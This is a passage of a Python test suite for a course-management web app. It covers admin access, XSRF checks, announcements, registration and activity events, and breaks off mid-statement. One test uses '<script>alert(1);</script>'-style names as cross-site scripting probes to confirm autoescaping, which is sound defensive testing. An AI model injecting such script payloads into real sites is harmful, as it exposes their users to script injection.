        """Tests /admin page showing multiple courses."""
        # Setup courses.
        sites.setup_courses('course:/aaa::ns_a, course:/bbb::ns_b, course:/:/')
        config.Registry.test_overrides[
            models.CAN_USE_MEMCACHE.name] = True

        # Validate the courses before import.
        all_courses = sites.get_all_courses()
        dst_app_context_a = all_courses[0]
        dst_app_context_b = all_courses[1]
        src_app_context = all_courses[2]

        # This test requires a read-write file system. If test runs on read-
        # only one, we can't run this test :(
        # Bug fix: the second clause previously re-checked context 'a';
        # both destination contexts must be writable.
        if (not dst_app_context_a.fs.is_read_write() or
                not dst_app_context_b.fs.is_read_write()):
            return

        course_a = courses.Course(None, app_context=dst_app_context_a)
        course_b = courses.Course(None, app_context=dst_app_context_b)

        unused_course, course_a = course_a.import_from(src_app_context)
        unused_course, course_b = course_b.import_from(src_app_context)

        # Rename courses.  (Bug fix: the escaped quotes inside these YAML
        # literals were lost, leaving invalid syntax; restored.)
        dst_app_context_a.fs.put(
            dst_app_context_a.get_config_filename(),
            vfs.string_to_stream(u'course:\n title: \'Course AAA\''))
        dst_app_context_b.fs.put(
            dst_app_context_b.get_config_filename(),
            vfs.string_to_stream(u'course:\n title: \'Course BBB\''))

        # Login.
        email = 'test_courses_page_for_multiple_courses@google.com'
        actions.login(email, is_admin=True)

        # Check the course listing page.
        response = self.testapp.get('/admin')
        assert_contains_all_of([
            'Course AAA',
            '/aaa/dashboard',
            'Course BBB',
            '/bbb/dashboard'], response.body)

        # Clean up.
        sites.reset_courses()

    def test_python_console(self):
        """Test access rights to the Python console."""
        email = 'test_python_console@google.com'

        # The default is that the console should be turned off.
        self.assertFalse(modules.admin.admin.DIRECT_CODE_EXECUTION_UI_ENABLED)

        # Test the console when it is enabled.
        modules.admin.admin.DIRECT_CODE_EXECUTION_UI_ENABLED = True

        # Check normal user has no access.
        actions.login(email)
        response = self.testapp.get('/admin?action=console')
        assert_equals(response.status_int, 302)
        response = self.testapp.post('/admin?action=console')
        assert_equals(response.status_int, 302)

        # Check delegated admin has no access.
        os.environ['gcb_admin_user_emails'] = '[%s]' % email
        actions.login(email)
        response = self.testapp.get('/admin?action=console')
        assert_equals(response.status_int, 200)
        assert_contains(
            'You must be an actual admin user to continue.', response.body)
        # NOTE(review): this repeats the identical GET; presumably one of
        # these was meant to exercise the POST/console_run path — confirm.
        response = self.testapp.get('/admin?action=console')
        assert_equals(response.status_int, 200)
        assert_contains(
            'You must be an actual admin user to continue.', response.body)
        del os.environ['gcb_admin_user_emails']

        # Check actual admin has access.
        actions.login(email, is_admin=True)
        response = self.testapp.get('/admin?action=console')
        assert_equals(response.status_int, 200)
        response.form.set('code', 'print "foo" + "bar"')
        response = self.submit(response.form)
        assert_contains('foobar', response.body)

        # Finally, test that the console is not found when it is disabled.
        modules.admin.admin.DIRECT_CODE_EXECUTION_UI_ENABLED = False
        actions.login(email, is_admin=True)
        self.testapp.get('/admin?action=console', status=404)
        self.testapp.post('/admin?action=console_run', status=404)

    def test_non_admin_has_no_access(self):
        """Test non admin has no access to pages or REST endpoints."""
        email = 'test_non_admin_has_no_access@google.com'
        actions.login(email)

        # Add datastore override.
        prop = config.ConfigPropertyEntity(
            key_name='gcb_config_update_interval_sec')
        prop.value = '5'
        prop.is_draft = False
        prop.put()

        # Check user has no access to specific pages and actions.
        response = self.testapp.get('/admin?action=settings')
        assert_equals(response.status_int, 302)
        response = self.testapp.get(
            '/admin?action=config_edit&name=gcb_admin_user_emails')
        assert_equals(response.status_int, 302)
        response = self.testapp.post(
            '/admin?action=config_reset&name=gcb_admin_user_emails')
        assert_equals(response.status_int, 302)

        # Check user has no rights to GET verb.
        response = self.testapp.get(
            '/rest/config/item?key=gcb_config_update_interval_sec')
        assert_equals(response.status_int, 200)
        json_dict = transforms.loads(response.body)
        assert json_dict['status'] == 401
        assert json_dict['message'] == 'Access denied.'

        # Here are the endpoints we want to test: (uri, xsrf_action_name).
        endpoints = [
            ('/rest/config/item', 'config-property-put'),
            ('/rest/courses/item', 'add-course-put')]

        # Check user has no rights to PUT verb.
        payload_dict = {}
        payload_dict['value'] = '666'
        payload_dict['is_draft'] = False
        request = {}
        request['key'] = 'gcb_config_update_interval_sec'
        request['payload'] = transforms.dumps(payload_dict)
        for uri, unused_action in endpoints:
            response = self.testapp.put(uri + '?%s' % urllib.urlencode(
                {'request': transforms.dumps(request)}), {})
            assert_equals(response.status_int, 200)
            assert_contains('"status": 403', response.body)

        # Check user still has no rights to PUT verb even if he somehow
        # obtained a valid XSRF token.
        for uri, action in endpoints:
            request['xsrf_token'] = XsrfTokenManager.create_xsrf_token(action)
            response = self.testapp.put(uri + '?%s' % urllib.urlencode(
                {'request': transforms.dumps(request)}), {})
            assert_equals(response.status_int, 200)
            json_dict = transforms.loads(response.body)
            assert json_dict['status'] == 401
            assert json_dict['message'] == 'Access denied.'

    def test_admin_list(self):
        """Test delegation of admin access to another user."""
        email = 'test_admin_list@google.com'
        actions.login(email)

        # Add environment variable override.
        os.environ['gcb_admin_user_emails'] = '[%s]' % email

        # Add datastore override.
        prop = config.ConfigPropertyEntity(
            key_name='gcb_config_update_interval_sec')
        prop.value = '5'
        prop.is_draft = False
        prop.put()

        # Check user has access now.
        response = self.testapp.get('/admin?action=settings')
        assert_equals(response.status_int, 200)

        # Check overrides are active and have proper management actions.
        assert_contains('gcb_admin_user_emails', response.body)
        assert_contains('[test_admin_list@google.com]', response.body)
        assert_contains(
            '/admin?action=config_override&name=gcb_admin_user_emails',
            response.body)
        assert_contains(
            '/admin?action=config_edit&name=gcb_config_update_interval_sec',
            response.body)

        # Check editor page has proper actions.
        response = self.testapp.get(
            '/admin?action=config_edit&name=gcb_config_update_interval_sec')
        assert_equals(response.status_int, 200)
        assert_contains('/admin?action=config_reset', response.body)
        assert_contains('name=gcb_config_update_interval_sec', response.body)

        # Remove override.
        del os.environ['gcb_admin_user_emails']

        # Check user has no access.
        response = self.testapp.get('/admin?action=settings')
        assert_equals(response.status_int, 302)

    def test_access_to_admin_pages(self):
        """Test access to admin pages."""
        # Assert anonymous user has no access.
        response = self.testapp.get('/admin?action=settings')
        assert_equals(response.status_int, 302)

        # Assert admin user has access.
        email = 'test_access_to_admin_pages@google.com'
        name = 'Test Access to Admin Pages'
        actions.login(email, is_admin=True)
        actions.register(self, name)

        response = self.testapp.get('/admin')
        assert_contains('Power Searching with Google', response.body)
        assert_contains('All Courses', response.body)

        response = self.testapp.get('/admin?action=settings')
        assert_contains('gcb_admin_user_emails', response.body)
        assert_contains('gcb_config_update_interval_sec', response.body)
        assert_contains('All Settings', response.body)

        response = self.testapp.get('/admin?action=perf')
        assert_contains('gcb-admin-uptime-sec:', response.body)
        assert_contains('In-process Performance Counters', response.body)

        response = self.testapp.get('/admin?action=deployment')
        assert_contains('application_id: testbed-test', response.body)
        assert_contains('About the Application', response.body)

        actions.unregister(self)
        actions.logout()

        # Assert non-admin user has no access.
        actions.login(email)
        actions.register(self, name)
        response = self.testapp.get('/admin?action=settings')
        assert_equals(response.status_int, 302)

    def test_multiple_courses(self):
        """Test courses admin page with two courses configured."""
        sites.setup_courses(
            'course:/foo:/foo-data, course:/bar:/bar-data:nsbar')

        email = 'test_multiple_courses@google.com'
        actions.login(email, is_admin=True)

        response = self.testapp.get('/admin')
        assert_contains('Course Builder > Admin > Courses', response.body)
        assert_contains('Total: 2 item(s)', response.body)

        # Check course URLs.
        assert_contains('<a href="/foo/dashboard">', response.body)
        assert_contains('<a href="/bar/dashboard">', response.body)

        # Check content locations.
        assert_contains('/foo-data', response.body)
        assert_contains('/bar-data', response.body)

        # Check namespaces.
        assert_contains('gcb-course-foo-data', response.body)
        assert_contains('nsbar', response.body)

        # Clean up.
        sites.reset_courses()

    def test_add_course(self):
        """Tests adding a new course entry."""
        if not self.supports_editing:
            return

        email = 'test_add_course@google.com'
        actions.login(email, is_admin=True)

        # Prepare request data.
        payload_dict = {
            'name': 'add_new',
            'title': u'new course (тест данные)', 'admin_email': 'foo@bar.com'}
        request = {}
        request['payload'] = transforms.dumps(payload_dict)
        request['xsrf_token'] = XsrfTokenManager.create_xsrf_token(
            'add-course-put')

        # Execute action.
        response = self.testapp.put('/rest/courses/item?%s' % urllib.urlencode(
            {'request': transforms.dumps(request)}), {})
        assert_equals(response.status_int, 200)

        # Check response.
        json_dict = transforms.loads(transforms.loads(response.body)['payload'])
        assert 'course:/add_new::ns_add_new' == json_dict.get('entry')

        # Re-execute action; should fail as this would create a duplicate.
        response = self.testapp.put('/rest/courses/item?%s' % urllib.urlencode(
            {'request': transforms.dumps(request)}), {})
        assert_equals(response.status_int, 200)
        assert_equals(412, transforms.loads(response.body)['status'])

        # Load the course and check its title.
        new_app_context = sites.get_all_courses(
            'course:/add_new::ns_add_new')[0]
        assert_equals(u'new course (тест данные)', new_app_context.get_title())
        new_course = courses.Course(None, app_context=new_app_context)
        assert not new_course.get_units()
class CourseAuthorAspectTest(actions.TestBase):
    """Tests the site from the Course Author perspective."""

    def test_dashboard(self):
        """Test course dashboard."""
        email = 'test_dashboard@google.com'
        name = 'Test Dashboard'

        # Non-admin doesn't have access.
        actions.login(email)
        response = self.get('dashboard')
        assert_equals(response.status_int, 302)
        actions.register(self, name)
        # NOTE(review): this re-asserts the response fetched before
        # registration; a fresh GET of 'dashboard' may have been
        # intended here — confirm.
        assert_equals(response.status_int, 302)
        actions.logout()

        # Admin has access.
        actions.login(email, is_admin=True)
        response = self.get('dashboard')
        assert_contains('Google > Dashboard > Outline', response.body)

        # Tests outline view.
        response = self.get('dashboard')
        assert_contains('Unit 3 - Advanced techniques', response.body)
        assert_contains('data/lesson.csv', response.body)

        # Check editability.
        if self.supports_editing:
            assert_contains('Add Assessment', response.body)
        else:
            assert_does_not_contain('Add Assessment', response.body)

        # Test assets view.
        response = self.get('dashboard?action=assets')
        assert_contains('Google > Dashboard > Assets', response.body)
        assert_contains('assets/css/main.css', response.body)
        assert_contains('assets/img/Image1.5.png', response.body)
        assert_contains('assets/js/activity-3.2.js', response.body)

        # Test settings view.  (Bug fix: the escaped single quotes inside
        # the two expected-text literals were lost, leaving invalid
        # syntax; restored.)
        response = self.get('dashboard?action=settings')
        assert_contains(
            'Google > Dashboard > Settings', response.body)
        assert_contains('course.yaml', response.body)
        assert_contains(
            'title: \'Power Searching with Google\'', response.body)
        assert_contains('locale: \'en_US\'', response.body)

        # Check editability.
        if self.supports_editing:
            assert_contains('create_or_edit_settings', response.body)
        else:
            assert_does_not_contain('create_or_edit_settings', response.body)

        # Tests student statistics view.
        response = self.get('dashboard?action=analytics')
        assert_contains(
            'Google > Dashboard > Analytics', response.body)
        assert_contains('have not been calculated yet', response.body)

        compute_form = response.forms['gcb-compute-student-stats']
        response = self.submit(compute_form)
        assert_equals(response.status_int, 302)
        assert len(self.taskq.GetTasks('default')) == 4

        response = self.get('dashboard?action=analytics')
        assert_contains('is running', response.body)

        self.execute_all_deferred_tasks()

        response = self.get('dashboard?action=analytics')
        assert_contains('were last updated at', response.body)
        assert_contains('currently enrolled: 1', response.body)
        assert_contains('total: 1', response.body)

        # Tests assessment statistics.
        old_namespace = namespace_manager.get_namespace()
        namespace_manager.set_namespace(self.namespace)
        try:
            for i in range(5):
                student = models.Student(key_name='key-%s' % i)
                student.is_enrolled = True
                student.scores = transforms.dumps({'test-assessment': i})
                student.put()
        finally:
            namespace_manager.set_namespace(old_namespace)

        response = self.get('dashboard?action=analytics')
        compute_form = response.forms['gcb-compute-student-stats']
        response = self.submit(compute_form)

        self.execute_all_deferred_tasks()

        response = self.get('dashboard?action=analytics')
        assert_contains('currently enrolled: 6', response.body)
        assert_contains(
            'test-assessment: completed 5, average score 2.0', response.body)

    def test_trigger_sample_announcements(self):
        """Test course author can trigger adding sample announcements."""
        email = 'test_announcements@google.com'
        name = 'Test Announcements'

        actions.login(email, is_admin=True)
        actions.register(self, name)

        # Registering as admin seeds the sample announcements.
        response = actions.view_announcements(self)
        assert_contains('Example Announcement', response.body)
        assert_contains('Welcome to the final class!', response.body)
        assert_does_not_contain('No announcements yet.', response.body)

    def test_manage_announcements(self):
        """Test course author can manage announcements."""
        email = 'test_announcements@google.com'
        name = 'Test Announcements'

        actions.login(email, is_admin=True)
        actions.register(self, name)

        # Add new.
        response = actions.view_announcements(self)
        add_form = response.forms['gcb-add-announcement']
        response = self.submit(add_form)
        assert_equals(response.status_int, 302)

        # Check edit form rendering.
        response = self.testapp.get(response.location)
        assert_equals(response.status_int, 200)
        assert_contains('/rest/announcements/item?key=', response.body)

        # Check added.
        response = actions.view_announcements(self)
        assert_contains('Sample Announcement (Draft)', response.body)

        # Delete draft.
        response = actions.view_announcements(self)
        delete_form = response.forms['gcb-delete-announcement-1']
        response = self.submit(delete_form)
        assert_equals(response.status_int, 302)

        # Check deleted.
        assert_does_not_contain('Welcome to the final class!', response.body)

    def test_announcements_rest(self):
        """Test REST access to announcements."""
        email = 'test_announcements_rest@google.com'
        name = 'Test Announcements Rest'

        actions.login(email, is_admin=True)
        actions.register(self, name)

        response = actions.view_announcements(self)
        assert_does_not_contain('My Test Title', response.body)

        # REST GET existing item.
        items = AnnouncementEntity.all().fetch(1)
        for item in items:
            response = self.get('rest/announcements/item?key=%s' % item.key())
            json_dict = transforms.loads(response.body)
            assert json_dict['status'] == 200
            assert 'message' in json_dict
            assert 'payload' in json_dict

            payload_dict = transforms.loads(json_dict['payload'])
            assert 'title' in payload_dict
            assert 'date' in payload_dict

            # REST PUT item.
            payload_dict['title'] = u'My Test Title Мой заголовок теста'
            payload_dict['date'] = '2012/12/31'
            payload_dict['is_draft'] = True
            payload_dict['send_email'] = False
            request = {}
            request['key'] = str(item.key())
            request['payload'] = transforms.dumps(payload_dict)

            # Check XSRF is required.
            response = self.put('rest/announcements/item?%s' % urllib.urlencode(
                {'request': transforms.dumps(request)}), {})
            assert_equals(response.status_int, 200)
            assert_contains('"status": 403', response.body)

            # Check PUT works.
            request['xsrf_token'] = json_dict['xsrf_token']
            response = self.put('rest/announcements/item?%s' % urllib.urlencode(
                {'request': transforms.dumps(request)}), {})
            assert_equals(response.status_int, 200)
            assert_contains('"status": 200', response.body)

            # Confirm change is visible on the page.
            response = self.get('announcements')
            assert_contains(
                u'My Test Title Мой заголовок теста (Draft)', response.body)

        # REST GET not-existing item.
        response = self.get('rest/announcements/item?key=not_existent_key')
        json_dict = transforms.loads(response.body)
        assert json_dict['status'] == 404
class StudentAspectTest(actions.TestBase):
    """Test the site from the Student perspective.

    Several tests here override course.yaml settings by monkey-patching
    sites.ApplicationContext.get_environ and restoring it at the end.
    NOTE(review): the restore is not wrapped in try/finally, so a failing
    assertion leaves the patch in place for subsequent tests — consider
    hardening if these tests ever become order-dependent.
    """
    def test_view_announcements(self):
        """Test student aspect of announcements."""
        email = 'test_announcements@google.com'
        name = 'Test Announcements'
        actions.login(email)
        actions.register(self, name)
        # Check no announcements yet.
        response = actions.view_announcements(self)
        assert_does_not_contain('Example Announcement', response.body)
        assert_does_not_contain('Welcome to the final class!', response.body)
        assert_contains('No announcements yet.', response.body)
        actions.logout()
        # Login as admin and add announcements.
        actions.login('admin@sample.com', is_admin=True)
        actions.register(self, 'admin')
        response = actions.view_announcements(self)
        actions.logout()
        # Check we can see non-draft announcements.
        actions.login(email)
        response = actions.view_announcements(self)
        assert_contains('Example Announcement', response.body)
        assert_does_not_contain('Welcome to the final class!', response.body)
        assert_does_not_contain('No announcements yet.', response.body)
        # Check no access to draft announcements via REST handler.
        items = AnnouncementEntity.all().fetch(1000)
        for item in items:
            response = self.get('rest/announcements/item?key=%s' % item.key())
            if item.is_draft:
                # Drafts must be hidden from ordinary students: JSON 401.
                json_dict = transforms.loads(response.body)
                assert json_dict['status'] == 401
            else:
                assert_equals(response.status_int, 200)
    def test_registration(self):
        """Test student registration."""
        email = 'test_registration@example.com'
        name1 = 'Test Student'
        name2 = 'John Smith'
        name3 = u'Pavel Simakov (тест данные)'
        actions.login(email)
        # Register, rename, unregister, then re-register under a new
        # (non-ASCII) name; the profile must track each change.
        actions.register(self, name1)
        actions.check_profile(self, name1)
        actions.change_name(self, name2)
        actions.unregister(self)
        actions.register(self, name3)
        actions.check_profile(self, name3)
    def test_course_not_available(self):
        """Tests course is only accessible to author when incomplete."""
        email = 'test_course_not_available@example.com'
        name = 'Test Course Not Available'
        actions.login(email)
        actions.register(self, name)
        # Check preview and static resources are available.
        response = self.get('course')
        assert_equals(response.status_int, 200)
        response = self.get('assets/js/activity-1.3.js')
        assert_equals(response.status_int, 200)
        # Override course.yaml settings by patching app_context.
        get_environ_old = sites.ApplicationContext.get_environ
        def get_environ_new(self):
            environ = get_environ_old(self)
            environ['course']['now_available'] = False
            return environ
        sites.ApplicationContext.get_environ = get_environ_new
        # Check preview and static resources are not available to Student.
        response = self.get('course', expect_errors=True)
        assert_equals(response.status_int, 404)
        response = self.get('assets/js/activity-1.3.js', expect_errors=True)
        assert_equals(response.status_int, 404)
        # Check preview and static resources are still available to author.
        actions.login(email, is_admin=True)
        response = self.get('course')
        assert_equals(response.status_int, 200)
        response = self.get('assets/js/activity-1.3.js')
        assert_equals(response.status_int, 200)
        # Clean up app_context.
        sites.ApplicationContext.get_environ = get_environ_old
    def test_registration_closed(self):
        """Test student registration when course is full."""
        email = 'test_registration_closed@example.com'
        name = 'Test Registration Closed'
        # Override course.yaml settings by patching app_context.
        get_environ_old = sites.ApplicationContext.get_environ
        def get_environ_new(self):
            environ = get_environ_old(self)
            environ['reg_form']['can_register'] = False
            return environ
        sites.ApplicationContext.get_environ = get_environ_new
        # Try to login and register.
        actions.login(email)
        try:
            actions.register(self, name)
            raise actions.ShouldHaveFailedByNow(
                'Expected to fail: new registrations should not be allowed '
                'when registration is closed.')
        except actions.ShouldHaveFailedByNow as e:
            # Registration unexpectedly succeeded: surface the failure.
            raise e
        except:
            # Bare except is deliberate here: any failure raised by
            # register() is the expected outcome when registration is closed.
            pass
        # Clean up app_context.
        sites.ApplicationContext.get_environ = get_environ_old
    def test_registration_with_additional_fields(self):
        """Registers a new student with customized registration form."""
        email = 'test_registration_with_additional_fields@example.com'
        name = 'Test Registration with Additional Fields'
        zipcode = '94043'
        score = '99'
        # Override course.yaml settings by patching app_context.
        get_environ_old = sites.ApplicationContext.get_environ
        def get_environ_new(self):
            """Insert additional fields into course.yaml."""
            environ = get_environ_old(self)
            environ['course']['browsable'] = False
            environ['reg_form']['additional_registration_fields'] = (
                '\'<!-- reg_form.additional_registration_fields -->'
                '<li>'
                '<label class="form-label" for="form02"> What is your zipcode?'
                '</label><input name="form02" type="text"></li>'
                '<li>'
                '<label class="form-label" for="form03"> What is your score?'
                '</label> <input name="form03" type="text"></li>\''
            )
            return environ
        sites.ApplicationContext.get_environ = get_environ_new
        # Login and register.
        actions.login(email)
        actions.register_with_additional_fields(self, name, zipcode, score)
        # Verify that registration results in capturing additional registration
        # questions.
        old_namespace = namespace_manager.get_namespace()
        namespace_manager.set_namespace(self.namespace)
        student = models.Student.get_enrolled_student_by_email(email)
        # Check that two registration additional fields are populated
        # with correct values. additional_fields is JSON: a list of
        # [field_name, value] pairs; indexes 2 and 3 are the custom fields.
        if student.additional_fields:
            json_dict = transforms.loads(student.additional_fields)
            assert zipcode == json_dict[2][1]
            assert score == json_dict[3][1]
        # Clean up app_context.
        sites.ApplicationContext.get_environ = get_environ_old
        namespace_manager.set_namespace(old_namespace)
    def test_permissions(self):
        """Test student permissions, and which pages they can view."""
        email = 'test_permissions@example.com'
        name = 'Test Permissions'
        # Override course.yaml settings by patching app_context.
        get_environ_old = sites.ApplicationContext.get_environ
        def get_environ_new(self):
            environ = get_environ_old(self)
            environ['course']['browsable'] = False
            return environ
        sites.ApplicationContext.get_environ = get_environ_new
        actions.login(email)
        # Enrolled -> unenrolled -> enrolled again; permissions must follow.
        actions.register(self, name)
        actions.Permissions.assert_enrolled(self)
        actions.unregister(self)
        actions.Permissions.assert_unenrolled(self)
        actions.register(self, name)
        actions.Permissions.assert_enrolled(self)
        # Clean up app_context.
        sites.ApplicationContext.get_environ = get_environ_old
    def test_login_and_logout(self):
        """Test if login and logout behave as expected."""
        # Override course.yaml settings by patching app_context.
        get_environ_old = sites.ApplicationContext.get_environ
        def get_environ_new(self):
            environ = get_environ_old(self)
            environ['course']['browsable'] = False
            return environ
        sites.ApplicationContext.get_environ = get_environ_new
        email = 'test_login_logout@example.com'
        actions.Permissions.assert_logged_out(self)
        actions.login(email)
        # Logged in but never registered: unenrolled.
        actions.Permissions.assert_unenrolled(self)
        actions.logout()
        actions.Permissions.assert_logged_out(self)
        # Clean up app_context.
        sites.ApplicationContext.get_environ = get_environ_old
    def test_lesson_activity_navigation(self):
        """Test navigation between lesson/activity pages."""
        email = 'test_lesson_activity_navigation@example.com'
        name = 'Test Lesson Activity Navigation'
        actions.login(email)
        actions.register(self, name)
        # First lesson: no "Previous Page" link.
        response = self.get('unit?unit=1&lesson=1')
        assert_does_not_contain('Previous Page', response.body)
        assert_contains('Next Page', response.body)
        # Middle lesson: both links present.
        response = self.get('unit?unit=2&lesson=3')
        assert_contains('Previous Page', response.body)
        assert_contains('Next Page', response.body)
        # Last lesson: "End" replaces "Next Page".
        response = self.get('unit?unit=3&lesson=5')
        assert_contains('Previous Page', response.body)
        assert_does_not_contain('Next Page', response.body)
        assert_contains('End', response.body)
    def test_attempt_activity_event(self):
        """Test activity attempt generates event."""
        email = 'test_attempt_activity_event@example.com'
        name = 'Test Attempt Activity Event'
        actions.login(email)
        actions.register(self, name)
        # Enable event recording.
        config.Registry.test_overrides[
            lessons.CAN_PERSIST_ACTIVITY_EVENTS.name] = True
        # Prepare event.
        request = {}
        request['source'] = 'test-source'
        request['payload'] = transforms.dumps({'Alice': u'Bob (тест данные)'})
        # Check XSRF token is required.
        response = self.post('rest/events?%s' % urllib.urlencode(
            {'request': transforms.dumps(request)}), {})
        assert_equals(response.status_int, 200)
        assert_contains('"status": 403', response.body)
        # Check PUT works.
        request['xsrf_token'] = XsrfTokenManager.create_xsrf_token(
            'event-post')
        response = self.post('rest/events?%s' % urllib.urlencode(
            {'request': transforms.dumps(request)}), {})
        assert_equals(response.status_int, 200)
        assert not response.body
        # Check event is properly recorded.
        old_namespace = namespace_manager.get_namespace()
        namespace_manager.set_namespace(self.namespace)
        try:
            events = models.EventEntity.all().fetch(1000)
            assert 1 == len(events)
            assert_contains(
                u'Bob (тест данные)',
                transforms.loads(events[0].data)['Alice'])
        finally:
            namespace_manager.set_namespace(old_namespace)
        # Clean up.
        config.Registry.test_overrides = {}
    def test_two_students_dont_see_each_other_pages(self):
        """Test a user can't see another user pages."""
        email1 = 'user1@foo.com'
        name1 = 'User 1'
        email2 = 'user2@foo.com'
        name2 = 'User 2'
        # Login as one user and view 'unit' and other pages, which are not
        # cached.
        actions.login(email1)
        actions.register(self, name1)
        actions.Permissions.assert_enrolled(self)
        response = actions.view_unit(self)
        assert_contains(email1, response.body)
        actions.logout()
        # Login as another user and check that 'unit' and other pages show
        # the correct new email.
        actions.login(email2)
        actions.register(self, name2)
        actions.Permissions.assert_enrolled(self)
        response = actions.view_unit(self)
        assert_contains(email2, response.body)
        actions.logout()
    def test_xsrf_defence(self):
        """Test defense against XSRF attack."""
        email = 'test_xsrf_defence@example.com'
        name = 'Test Xsrf Defence'
        actions.login(email)
        actions.register(self, name)
        response = self.get('student/home')
        edit_form = actions.get_form_by_action(response, 'student/editstudent')
        edit_form.set('name', 'My New Name')
        # Submitting with a forged token must be rejected outright.
        edit_form.set('xsrf_token', 'bad token')
        response = edit_form.submit(expect_errors=True)
        assert_equals(response.status_int, 403)
    def test_autoescaping(self):
        """Test Jinja autoescaping."""
        email = 'test_autoescaping@example.com'
        # Names are raw <script> payloads; rendering them must not execute
        # (check_profile/change_name assert on the escaped output).
        name1 = '<script>alert(1);</script>'
        name2 = '<script>alert(2);</script>'
        actions.login(email)
        actions.register(self, name1)
        actions.check_profile(self, name1)
        actions.change_name(self, name2)
        actions.unregister(self)
    def test_response_headers(self):
        """Test dynamically-generated responses use proper headers."""
        email = 'test_response_headers@example.com'
        name = 'Test Response Headers'
        actions.login(email)
        actions.register(self, name)
        response = self.get('student/home')
        assert_equals(response.status_int, 200)
        # Dynamic pages must never be cached by browsers or proxies.
        assert_contains('must-revalidate', response.headers['Cache-Control'])
        assert_contains('no-cache', response.headers['Cache-Control'])
        assert_contains('no-cache', response.headers['Pragma'])
        assert_contains('Mon, 01 Jan 1990', response.headers['Expires'])
    def test_browsability_permissions(self):
        """Tests that the course browsability flag works correctly."""
        # By default, courses are browsable.
        response = self.get('course')
        assert_equals(response.status_int, 200)
        assert_contains('<a href="assessment?name=Pre"', response.body)
        assert_does_not_contain('progress-notstarted-Pre', response.body)
        actions.Permissions.assert_can_browse(self)
        # Override course.yaml settings by patching app_context.
        get_environ_old = sites.ApplicationContext.get_environ
        def get_environ_new(self):
            environ = get_environ_old(self)
            environ['course']['browsable'] = False
            return environ
        sites.ApplicationContext.get_environ = get_environ_new
        actions.Permissions.assert_logged_out(self)
        # Check course page redirects (to login) when not browsable.
        response = self.get('course', expect_errors=True)
        assert_equals(response.status_int, 302)
        # Clean up app_context.
        sites.ApplicationContext.get_environ = get_environ_old
class StudentUnifiedProfileTest(StudentAspectTest):
    """Tests student actions having unified profile enabled.

    Re-runs every StudentAspectTest case with the shared (cross-course)
    student profile feature switched on via a config override.
    """
    def setUp(self):  # pylint: disable-msg=g-bad-name
        super(StudentUnifiedProfileTest, self).setUp()
        # Key the override by the property's name: overrides are looked up
        # by name, and every other test_overrides use in this file (e.g.
        # lessons.CAN_PERSIST_ACTIVITY_EVENTS.name) does the same. Keying
        # by the property object itself would leave the override unused.
        config.Registry.test_overrides[
            models.CAN_SHARE_STUDENT_PROFILE.name] = True
    def tearDown(self):  # pylint: disable-msg=g-bad-name
        # Drop all overrides before the base class tears down the app.
        config.Registry.test_overrides = {}
        super(StudentUnifiedProfileTest, self).tearDown()
class StaticHandlerTest(actions.TestBase):
    """Check serving of static resources."""
    def test_disabled_modules_has_no_routes(self):
        """Test that disabled modules has no routes."""
        # The oeditor module starts enabled with both route sets populated.
        assert modules.oeditor.oeditor.custom_module.enabled
        assert modules.oeditor.oeditor.custom_module.global_routes
        assert modules.oeditor.oeditor.custom_module.namespaced_routes
        modules.oeditor.oeditor.custom_module.disable()
        try:
            # Disabling must clear the enabled flag and both route lists.
            assert not modules.oeditor.oeditor.custom_module.enabled
            assert not modules.oeditor.oeditor.custom_module.global_routes
            assert not modules.oeditor.oeditor.custom_module.namespaced_routes
        finally:
            # Re-enable even on failure so other tests see a sane registry.
            modules.oeditor.oeditor.custom_module.enable()
    def test_static_files_cache_control(self):
        """Test static/zip handlers use proper Cache-Control headers."""
        # Check static handler: cacheable, public, no no-cache directive.
        response = self.get('/assets/css/main.css')
        assert_equals(response.status_int, 200)
        assert_contains('max-age=600', response.headers['Cache-Control'])
        assert_contains('public', response.headers['Cache-Control'])
        assert_does_not_contain('no-cache', response.headers['Cache-Control'])
        # Check zip file handler serves bundled assets with the same policy.
        response = self.testapp.get(
            '/static/inputex-3.1.0/src/inputex/assets/skins/sam/inputex.css')
        assert_equals(response.status_int, 200)
        assert_contains('max-age=600', response.headers['Cache-Control'])
        assert_contains('public', response.headers['Cache-Control'])
        assert_does_not_contain('no-cache', response.headers['Cache-Control'])
class ActivityTest(actions.TestBase):
    """Test for activities."""
    def get_activity(self, unit_id, lesson_id, args):
        """Retrieve the activity page for a given unit and lesson id.

        Also extracts the page's event XSRF token into args['xsrf_token'],
        so the returned args can be posted straight to rest/events.

        Returns:
            A (response, args) pair.
        """
        response = self.get('activity?unit=%s&lesson=%s' % (unit_id, lesson_id))
        assert_equals(response.status_int, 200)
        assert_contains(
            '<script src="assets/js/activity-%s.%s.js"></script>' %
            (unit_id, lesson_id), response.body)
        assert_contains('assets/lib/activity-generic-1.3.js', response.body)
        js_response = self.get('assets/lib/activity-generic-1.3.js')
        assert_equals(js_response.status_int, 200)
        # Extract XSRF token from the page.
        match = re.search(r'eventXsrfToken = [\']([^\']+)', response.body)
        assert match
        xsrf_token = match.group(1)
        args['xsrf_token'] = xsrf_token
        return response, args
    def test_activities(self):
        """Test that activity submissions are handled and recorded correctly."""
        email = 'test_activities@google.com'
        name = 'Test Activities'
        unit_id = 1
        lesson_id = 2
        # Canned submission payload for lesson '1.2', block index 3.
        activity_submissions = {
            '1.2': {
                'index': 3,
                'type': 'activity-choice',
                'value': 3,
                'correct': True,
            },
        }
        # Register.
        actions.login(email)
        actions.register(self, name)
        # Enable event recording.
        config.Registry.test_overrides[
            lessons.CAN_PERSIST_ACTIVITY_EVENTS.name] = True
        # Navigate to the course overview page, and check that the unit shows
        # no progress yet.
        response = self.get('course')
        assert_equals(response.status_int, 200)
        assert_contains(
            u'id="progress-notstarted-%s"' % unit_id, response.body)
        old_namespace = namespace_manager.get_namespace()
        namespace_manager.set_namespace(self.namespace)
        try:
            response, args = self.get_activity(unit_id, lesson_id, {})
            # Check that the current activity shows no progress yet.
            assert_contains(
                u'id="progress-notstarted-%s-activity"' %
                lesson_id, response.body)
            # Prepare activity submission event.
            args['source'] = 'attempt-activity'
            lesson_key = '%s.%s' % (unit_id, lesson_id)
            assert lesson_key in activity_submissions
            args['payload'] = activity_submissions[lesson_key]
            args['payload']['location'] = (
                'http://localhost:8080/activity?unit=%s&lesson=%s' %
                (unit_id, lesson_id))
            args['payload'] = transforms.dumps(args['payload'])
            # Submit the request to the backend.
            response = self.post('rest/events?%s' % urllib.urlencode(
                {'request': transforms.dumps(args)}), {})
            assert_equals(response.status_int, 200)
            assert not response.body
            # Check that the current activity shows partial progress.
            response, args = self.get_activity(unit_id, lesson_id, {})
            assert_contains(
                u'id="progress-inprogress-%s-activity"' %
